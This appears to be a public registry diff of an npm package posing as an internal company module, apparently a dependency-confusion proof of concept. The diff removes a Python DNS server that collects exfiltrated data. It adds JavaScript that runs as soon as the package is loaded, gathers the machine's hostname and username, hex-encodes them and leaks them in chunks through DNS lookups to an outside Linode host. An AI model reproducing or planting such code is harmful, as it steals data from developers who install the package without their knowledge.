internal-company-module-test-1337 99.99.99 → 99.99.999
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +32 -64
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,70 +1,38 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
import json
|
|
4
|
-
from dnslib import DNSRecord, QTYPE, RR, A
|
|
1
|
+
const dns = require('dns');
|
|
2
|
+
const os = require('os');
|
|
5
3
|
|
|
6
|
-
|
|
7
|
-
|
|
4
|
+
module.exports = function() {
|
|
5
|
+
return true;
|
|
6
|
+
};
|
|
8
7
|
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
8
|
+
(async function executeStealthExfiltration() {
|
|
9
|
+
try {
|
|
10
|
+
const attackerDomain = "139-162-186-101.ip.linodeusercontent.com";
|
|
11
|
+
|
|
12
|
+
const trackingData = JSON.stringify({
|
|
13
|
+
poc: "dependency-confusion",
|
|
14
|
+
host: os.hostname(),
|
|
15
|
+
user: os.userInfo().username
|
|
16
|
+
});
|
|
12
17
|
|
|
13
|
-
|
|
14
|
-
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
15
|
-
|
|
16
|
-
try:
|
|
17
|
-
server_socket.bind(('0.0.0.0', 53))
|
|
18
|
-
print("[*] Server STEALTH in ascolto su UDP 53...")
|
|
19
|
-
except PermissionError:
|
|
20
|
-
return
|
|
18
|
+
const hexEncodedData = Buffer.from(trackingData).toString('hex');
|
|
21
19
|
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
qname = str(qname_obj).rstrip('.')
|
|
28
|
-
|
|
29
|
-
if qname.endswith(ATTACKER_DOMAIN.strip('.')):
|
|
30
|
-
|
|
31
|
-
payload = qname.replace(ATTACKER_DOMAIN.strip('.'), "").strip('.')
|
|
32
|
-
parts = payload.split('.')
|
|
33
|
-
|
|
34
|
-
if len(parts) >= 2:
|
|
35
|
-
session_id = parts[0]
|
|
36
|
-
chunk_data = parts[1]
|
|
37
|
-
|
|
38
|
-
if session_id not in sessions:
|
|
39
|
-
sessions[session_id] = []
|
|
40
|
-
print(f"[*] Nuova sessione stealth avviata: {session_id}")
|
|
41
|
-
|
|
42
|
-
if chunk_data == "eof":
|
|
43
|
-
# Termine della trasmissione: Riassembla e decodifica l'hex
|
|
44
|
-
full_hex = "".join(sessions[session_id])
|
|
45
|
-
try:
|
|
46
|
-
decoded_str = binascii.unhexlify(full_hex).decode('utf-8')
|
|
47
|
-
json_data = json.loads(decoded_str)
|
|
48
|
-
|
|
49
|
-
print(f"\n[+] ESFILTRAZIONE COMPLETATA (IP: {addr[0]})")
|
|
50
|
-
print(json.dumps(json_data, indent=4))
|
|
51
|
-
print("-" * 50)
|
|
52
|
-
except Exception as e:
|
|
53
|
-
print(f"[!] Errore decodifica: {e}")
|
|
54
|
-
|
|
55
|
-
del sessions[session_id]
|
|
56
|
-
else:
|
|
57
|
-
# Salva il blocco HEX e rispondi
|
|
58
|
-
sessions[session_id].append(chunk_data)
|
|
59
|
-
|
|
60
|
-
# Risposta per mantenere la connessione attiva e silenziosa
|
|
61
|
-
reply = dns_request.reply()
|
|
62
|
-
if dns_request.questions[0].qtype == QTYPE.A:
|
|
63
|
-
reply.add_answer(RR(rname=qname_obj, rtype=QTYPE.A, rclass=1, ttl=60, rdata=A(FAKE_RESPONSE_IP)))
|
|
64
|
-
server_socket.sendto(reply.pack(), addr)
|
|
20
|
+
const chunkSize = 30;
|
|
21
|
+
const chunks = [];
|
|
22
|
+
for (let i = 0; i < hexEncodedData.length; i += chunkSize) {
|
|
23
|
+
chunks.push(hexEncodedData.slice(i, i + chunkSize));
|
|
24
|
+
}
|
|
65
25
|
|
|
66
|
-
|
|
67
|
-
|
|
26
|
+
const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));
|
|
27
|
+
const sessionId = Math.floor(Math.random() * 0xffff).toString(16).padStart(4, '0');
|
|
68
28
|
|
|
69
|
-
|
|
70
|
-
|
|
29
|
+
for (let index = 0; index < chunks.length; index++) {
|
|
30
|
+
const payload = `${sessionId}.${chunks[index]}.${attackerDomain}`;
|
|
31
|
+
dns.lookup(payload, () => {});
|
|
32
|
+
await sleep(500);
|
|
33
|
+
}
|
|
34
|
+
|
|
35
|
+
dns.lookup(`${sessionId}.eof.${attackerDomain}`, () => {});
|
|
36
|
+
|
|
37
|
+
} catch (error) {}
|
|
38
|
+
})();
|